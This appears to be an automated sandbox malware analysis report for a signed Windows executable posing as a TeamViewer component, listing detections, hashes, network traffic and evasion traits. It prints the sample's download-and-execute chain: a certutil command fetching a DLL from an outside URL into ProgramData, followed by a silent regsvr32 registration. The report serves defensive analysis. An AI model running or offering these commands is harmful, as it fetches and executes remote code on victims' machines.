Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name: cBQPecnQRp (renamed file extension from none to exe)
Analysis ID: 483791
MD5: 53817315b195e328ccc0f56b15b247c7
SHA1: 7bedab96b89d000288b573de0b5693cf49dae47f
SHA256: ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags: exe, HartexLLC, signed

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 47
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: cBQPecnQRp.exe Virustotal: Detection: 10%
Multi AV Scanner detection for domain / URL
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll Virustotal: Detection: 11%

Compliance:

Uses 32bit PE files
Source: cBQPecnQRp.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificate
Source: cBQPecnQRp.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00466410 FindFirstFileExW, 1_2_00466410

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe Domain query: www.christchurchmvl.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 15 Sep 2021 11:47:29 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exe String found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: www.christchurchmvl.org
Source: global traffic HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: */* | User-Agent: Microsoft-CryptoAPI/10.0 | Host: www.christchurchmvl.org
Source: global traffic HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1 | Accept: */* | User-Agent: CertUtil URL Agent | Host: www.christchurchmvl.org | Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

Uses 32bit PE files
Source: cBQPecnQRp.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044F26F appears 71 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 1_2_0044E3F5
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: cBQPecnQRp.exe Binary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
PE file contains strange resources
Source: cBQPecnQRp.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: actxapilib.dll
Source: cBQPecnQRp.exe Virustotal: Detection: 10%
Source: cBQPecnQRp.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: classification engine Classification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource, 1_2_00422D90
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Command line argument: ~GI 1_2_004946D0
Source: C:\Windows\SysWOW64\certutil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: cBQPecnQRp.exe Static file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exe Static PE information: certificate valid
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00434A6C push eax; ret 1_2_00434A91
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00410AAA push ss; iretd 1_2_00410AAB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044F73C push ecx; ret 1_2_0044F74F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx 1_2_00493991
PE file contains sections with non-standard names
Source: cBQPecnQRp.exe Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5845
Registers a DLL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044E000

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo, 1_2_0044C1E6
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00466410 FindFirstFileExW, 1_2_00466410

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW, 1_2_0044EE91
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5845
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree, 1_2_004944F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h] 1_2_0046619E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h] 1_2_00434891
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h] 1_2_0044ECD5
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h] 1_2_0045D9CF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044FE43 SetUnhandledExceptionFilter, 1_2_0044FE43
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0045976E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0044F8B8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe Domain query: www.christchurchmvl.org
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00468B1F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468DC7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468E12
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468EAD
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_00468F40
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004691A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004692C6
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004693CC
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_0046949B
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_0046354D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004639F3
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0041E0FC cpuid 1_2_0041E0FC
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00440690 GetLocalTime, 1_2_00440690

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 1_2_004A85C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 1_2_004A7879